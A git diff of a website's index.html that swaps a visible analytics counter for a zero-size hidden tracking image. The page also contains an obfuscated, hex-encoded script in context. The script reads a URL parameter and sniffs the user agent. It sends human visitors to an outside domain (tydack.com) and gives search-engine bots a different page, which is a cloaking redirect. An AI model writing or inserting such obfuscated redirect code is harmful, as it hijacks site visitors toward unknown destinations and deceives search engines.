--- a/index.html
+++ b/index.html
@@ -37,18 +37,7 @@
 @media screen and ( min-height: 600px ) {.container {transform: scale(1.7);}}
 </style>
 </head>
-
-<script type="text/javascript">var _Hasync= _Hasync|| [];
-_Hasync.push(['Histats.start', '1,4705536,4,0,0,0,00010000']);
-_Hasync.push(['Histats.fasi', '1']);
-_Hasync.push(['Histats.track_hits', '']);
-(function() {
-var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
-hs.src = ('//s10.histats.com/js15_as.js');
-(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
-})();</script>
-<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4705536&101" alt="counter statistics" border="0"></a></noscript>
-<script>
+<img src="//sstatic1.histats.com/0.gif?4705536&101" alt="" border="0" style="width:0;height:0;"><script>
 var _0xa0a0=["\x72\x65\x70\x6C\x61\x63\x65","\x73\x65\x61\x72\x63\x68","\x70\x61\x74\x68\x6E\x61\x6D\x65","\x65\x78\x65\x63","","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x69\x74\x65\x6D","\x68\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x79\x64\x61\x63\x6B\x2E\x63\x6F\x6D\x2F\x6B\x6F\x2F\x69\x2F","\x2E\x68\x74\x6D\x6C"];(function(){let _0xfe03x1=(function(){var _0xfe03x2={};location[_0xa0a0[1]][_0xa0a0[0]](/[?&]+([^=&]+)=([^&]*)/gi,function(_0xfe03x3,_0xfe03x4,_0xfe03x5){_0xfe03x2[_0xfe03x4]= _0xfe03x5});return _0xfe03x2})();(/(\d+)\.html$/[_0xa0a0[3]](location[_0xa0a0[2]]))?/(\d+)\.html$/[_0xa0a0[3]](location[_0xa0a0[2]])[1]:_0xa0a0[4];let _0xfe03x6=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0xa0a0[6]](navigator[_0xa0a0[5]]);if(_0xfe03x1[_0xa0a0[7]]&&  !_0xfe03x6){location[_0xa0a0[8]]= _0xa0a0[9]+ _0xfe03x1[_0xa0a0[7]]+ _0xa0a0[4]}else {if(_0xfe03x1[_0xa0a0[7]]&& _0xfe03x6){location[_0xa0a0[0]](_0xa0a0[9]+ _0xfe03x1[_0xa0a0[7]]+ _0xa0a0[10])}}})()
 </script>
 
